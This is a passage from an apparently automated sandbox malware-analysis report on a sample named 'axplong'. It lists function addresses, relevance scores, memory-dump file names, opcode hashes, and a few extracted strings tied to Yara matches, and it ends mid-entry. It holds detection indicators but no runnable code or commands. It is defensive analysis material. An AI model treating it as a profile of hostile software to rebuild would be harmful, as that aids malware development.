                                                                    • Instruction Fuzzy Hash: 713145EB13C125BD7152C0427F2CAFBAB6EE9C2730330843AFA07C5943E2D90A591272
                                                                    Function 052F0B60 Relevance: .2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10c53fce7cfb92b8170530e2d2adb36d200803dbee217ce01fd84c59c7b0d943
                                                                    • Instruction ID: a4c546aabc74526eeed25ffbb52d8fc51e61201213c015ecc631cb62925f6b27
                                                                    • Opcode Fuzzy Hash: 10c53fce7cfb92b8170530e2d2adb36d200803dbee217ce01fd84c59c7b0d943
                                                                    • Instruction Fuzzy Hash: EB3132EB13C124BD7152C1427F2CAFBAB6FE9D6734331843AFA07C5A47A2D91A591231
                                                                    Function 052F0C31 Relevance: .1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65194ca09f21698a760c15f1d92d3083566bb8d6aff160e8805f25b19d9aeea4
                                                                    • Instruction ID: 5cc01147d31370550aedb5a7feb61879b4cb9c6aee12fb86cc0128e73f9686ed
                                                                    • Opcode Fuzzy Hash: 65194ca09f21698a760c15f1d92d3083566bb8d6aff160e8805f25b19d9aeea4
                                                                    • Instruction Fuzzy Hash: A7319AEB13C120BDB142C1417F5CAFBABAEE9C2A30330842BFA03C5947E2D90A495271
                                                                    Function 052F0C15 Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9ce92a40284451f000012a53bd4b9f812aacea091536822563e94837555a536
                                                                    • Instruction ID: ae397fc3abd96d6ef29834b4393fa94ddaf6f83c01ebd0188f258b424619935d
                                                                    • Opcode Fuzzy Hash: a9ce92a40284451f000012a53bd4b9f812aacea091536822563e94837555a536
                                                                    • Instruction Fuzzy Hash: 992149EB53C114BDB151C1417F1CAFBA7AEE9C6734330843AFA07D4947E2D91A591271
                                                                    Function 052F0BD3 Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 87e70fe3418709d5ab0d5b9db1ed5cd609fc83bd0849fedb7d10187ada0c1a68
                                                                    • Instruction ID: 400aeec766dd12b2a82384515344af584174bdb49a4f9240ecc5ad099ce18e2d
                                                                    • Opcode Fuzzy Hash: 87e70fe3418709d5ab0d5b9db1ed5cd609fc83bd0849fedb7d10187ada0c1a68
                                                                    • Instruction Fuzzy Hash: 1A217CEB13C114BDB141C1517F6CAFBABAEEAC2730330852BFA03C5547D2D91A591272
                                                                    Function 052F0BC2 Relevance: .1, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 364467e3304739a4e6fb882fbd886a6517e50ddd00bc2a5c724796163ab32660
                                                                    • Instruction ID: b49a59f065f0e04e70e019077ef7056801b5276fd89bc59680cc0fefdfc50e3c
                                                                    • Opcode Fuzzy Hash: 364467e3304739a4e6fb882fbd886a6517e50ddd00bc2a5c724796163ab32660
                                                                    • Instruction Fuzzy Hash: 402106EB13C124BD7151C5427F6CAFBA7AFE9D6B30330842AFA07D4947A2D91A591231
                                                                    Function 052F0C62 Relevance: .1, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11db1bf61485f9cf658faafface850646d93521035b240d37739f61f8151fc53
                                                                    • Instruction ID: 58b747de0220ba90cf81e81c831a1b80080bc9590ebbcf92ddb1488fda83b6d0
                                                                    • Opcode Fuzzy Hash: 11db1bf61485f9cf658faafface850646d93521035b240d37739f61f8151fc53
                                                                    • Instruction Fuzzy Hash: BB219CEB13C114BD7511C5517B6CAFBAB6FEAC6B30331842BFA07C4907E2D90A4A5232
                                                                    Function 052F0BF7 Relevance: .1, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c31197dc344d8ca6046bf4a18ba349d7e877c6ef0efc21903a8d1b72e64d105
                                                                    • Instruction ID: a3b623ec92c5e26253751b82650ca76eaec517d8a151a252b3ec2acb4b38f825
                                                                    • Opcode Fuzzy Hash: 0c31197dc344d8ca6046bf4a18ba349d7e877c6ef0efc21903a8d1b72e64d105
                                                                    • Instruction Fuzzy Hash: 962169EB53C114BD7151C1423F5CAFBABAEE9D6730330882AFA03C5947E2E91A591272
                                                                    Function 052F0BA1 Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff4ffcc617c2500221f9405771defd97ff7267c3af5ca3f6d6f959da72751756
                                                                    • Instruction ID: 4d773bc6a97bfecba4a0d80e55ef2015937461fd69e2b763f07aedc1eeed6015
                                                                    • Opcode Fuzzy Hash: ff4ffcc617c2500221f9405771defd97ff7267c3af5ca3f6d6f959da72751756
                                                                    • Instruction Fuzzy Hash: 1A2116EB13C124BD7151C1427F6CAFBABAFE9D6730330842AFA07D4947A2D91A591272
                                                                    Function 052F0CA1 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5134ed55db68d4b78b65265515735d0dc07bd20541fc8698b9161fffb8cfbef
                                                                    • Instruction ID: add8979e14e330cccd0985f0a0f207b2cb3fe200b5543b3f7743e7d03a875050
                                                                    • Opcode Fuzzy Hash: a5134ed55db68d4b78b65265515735d0dc07bd20541fc8698b9161fffb8cfbef
                                                                    • Instruction Fuzzy Hash: 6911EEAB53C114EDA210D5217E6C9FAAB6BEDC2730331842AF503C5807D2A95A491232
                                                                    Function 052F0C88 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 81b66cb5b6c9ca5529e9d1a438239abf645086270d5c40d5777347d90ae32504
                                                                    • Instruction ID: 013273fcade3abff6df4bffc4b216ea2d4203655e8a74025e3f0b83e9d4e0daa
                                                                    • Opcode Fuzzy Hash: 81b66cb5b6c9ca5529e9d1a438239abf645086270d5c40d5777347d90ae32504
                                                                    • Instruction Fuzzy Hash: 9111BCAB53C110ED7251D5513B5CAFAAB6FE9D27703308836FA03D490392D40A595232
                                                                    Function 052F0D6C Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e0cac2f1e38bc27107829b86bc5fb8af19c0589a9092b191ea2ff6e482784d1
                                                                    • Instruction ID: b60a4eb31b0fa486a9c0fca08107b2e49e2684bca41bcd72c6e662fac4f696ac
                                                                    • Opcode Fuzzy Hash: 5e0cac2f1e38bc27107829b86bc5fb8af19c0589a9092b191ea2ff6e482784d1
                                                                    • Instruction Fuzzy Hash: D911A0BF23C115ADB011D5657B5CEFAAB6EEEC2B30331892AF603C5443D3D56A4A1271
                                                                    Function 052F0CE0 Relevance: .1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 471269d726843af832985ff3f0d58a99226276adbb6d8ecbeaf485e95b53414f
                                                                    • Instruction ID: 0e5aeaf2bd129985d5549054ead49baeb522937fc1402e2bc3dbc83aa6f1cf8d
                                                                    • Opcode Fuzzy Hash: 471269d726843af832985ff3f0d58a99226276adbb6d8ecbeaf485e95b53414f
                                                                    • Instruction Fuzzy Hash: 7901A1AB13C114ADB150D6523F6CAFBA76EE9C5B30331852BF607C1947D2E51A591231
                                                                    Function 052F0CD0 Relevance: .1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ecb4607fce0ec014f381b08ab9ade64a34bb4d608bb53cbf1f4e70f88ffba0f
                                                                    • Instruction ID: aa6f762347d3f755778ea68b3ae308a6e2cfdfa27682eb93f706274b1103a4e0
                                                                    • Opcode Fuzzy Hash: 3ecb4607fce0ec014f381b08ab9ade64a34bb4d608bb53cbf1f4e70f88ffba0f
                                                                    • Instruction Fuzzy Hash: 8201A9AB13C114ED6150D5413F6CEFAA72EE9C6B30331892AFA03C4503D3E91A591231
                                                                    Function 052F0CE8 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adeb7ded3b4fcf5d033a33662cb8aaba9e93228fa6bcfbd190bf57b9ecacd572
                                                                    • Instruction ID: 36a0a471fca2615feb9142353aefb10c1b32b9c37addc39bedee6eb70a6cb3b9
                                                                    • Opcode Fuzzy Hash: adeb7ded3b4fcf5d033a33662cb8aaba9e93228fa6bcfbd190bf57b9ecacd572
                                                                    • Instruction Fuzzy Hash: B901A1AA13C110BCB150DA523F689FBA72EE9D5B30330892BF143C1443D3E51A591231
                                                                    Function 052F0D17 Relevance: .1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: decf6e74ad51aaff3d4cc6c069a1409e9b19adeedb3c1c12e517d63c512b62cb
                                                                    • Instruction ID: 970b3f76975820b313bc9cf49aa84673d3abf31aff6b35fa887380b67d534f84
                                                                    • Opcode Fuzzy Hash: decf6e74ad51aaff3d4cc6c069a1409e9b19adeedb3c1c12e517d63c512b62cb
                                                                    • Instruction Fuzzy Hash: 5501D2BB13D244ADB210D2557F6CAFAAB6EDAC6730331886BF503C2443D3990A5D4231
                                                                    Function 052F0D49 Relevance: .1, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3391611597.00000000052F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_52f0000_axplong.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1acc2de52745f8ed50564bd84da2de521321c348421d2bfa4d6fcaa9f3326de6
                                                                    • Instruction ID: 0617a98a903f0fb80c0668b8782534830668fc47b04c26792d935d29cb4eb78d
                                                                    • Opcode Fuzzy Hash: 1acc2de52745f8ed50564bd84da2de521321c348421d2bfa4d6fcaa9f3326de6
                                                                    • Instruction Fuzzy Hash: 66F03CAB23D110AD7150D1923F6CAFAA76ED9D6B70331892BF503C4443D6991A4E1231

                                                                    Non-executed Functions

                                                                    Function 008FE440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                                                                    • API String ID: 0-214772295
                                                                    • Opcode ID: ab07b7920137a2edce7dc1cd8ee4a816b422404429dfca48b43a05cfad288772
                                                                    • Instruction ID: 73990b0a6ca785e32a28f1691cffda80a0005c9753385742fa2e6f091e786a12
                                                                    • Opcode Fuzzy Hash: ab07b7920137a2edce7dc1cd8ee4a816b422404429dfca48b43a05cfad288772
                                                                    • Instruction Fuzzy Hash: BE82D27090424C9FEF14EF68C9897DEBFB6EB46304F508198E905673C2C7759A88CB92
                                                                    Function 00933068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 66ec1d32905d0fa89759f162d76e7abcd686f4de985bca7c4b22a4d120cbd824
                                                                    • Instruction ID: a4bb6f97dc7e309c09c3816befbdeded26742a86fcd08515ea9277f1d459629a
                                                                    • Opcode Fuzzy Hash: 66ec1d32905d0fa89759f162d76e7abcd686f4de985bca7c4b22a4d120cbd824
                                                                    • Instruction Fuzzy Hash: F7C24F71E486288FDB25CF28DD407EAB7B9EB44305F1585EAD84DE7240E778AE858F40
                                                                    Function 00932BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                    • Instruction ID: ca920a58e772e9ed5099c470a3d9370412a7c08761614d8723250890178eaced
                                                                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                    • Instruction Fuzzy Hash: A8F12E71E012199FDF14CFA9C8806AEB7B5FF88314F158269E919AB385D731AE41CF90
                                                                    Function 0090CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,0090CE82,?,?,?,?,0090CEB7,?,?,?,?,?,?,0090C42D,?,00000001), ref: 0090CB33
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$FilePreciseSystem
                                                                    • String ID:
                                                                    • API String ID: 1802150274-0
                                                                    • Opcode ID: 2207cfa94eb043bc4ddb6c40cde70d4d86c05e92eba35ce44d28687d345e3ddb
                                                                    • Instruction ID: a2fc572d147c5d0f22d958022f5d394709563ec6edf42978261690fc22f0ef21
                                                                    • Opcode Fuzzy Hash: 2207cfa94eb043bc4ddb6c40cde70d4d86c05e92eba35ce44d28687d345e3ddb
                                                                    • Instruction Fuzzy Hash: A4D0223262B1389BCA122B91AC088ADBB1CAF41B513000212ED04231608AA05C01BBD0
                                                                    Function 00927D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                    • Instruction ID: 1d2d49e91d0f7f96c4cf87367b80f46ab2bf4c92930c3fc28d76c943089fc8b2
                                                                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                    • Instruction Fuzzy Hash: 9E51BA7120C63857CB389AF8B9967BFE79E9F52300F14085DE442F76EECA159D488362
                                                                    Function 008F4CF0 Relevance: .7, Instructions: 701COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 580813ec231af8d693831234a62ad496673b1066266c8758196e884e8bbe147a
                                                                    • Instruction ID: 022e3a69648d08134b33eedc8d68a8b37766b74a8c7bc351dd25c856dd4c91f6
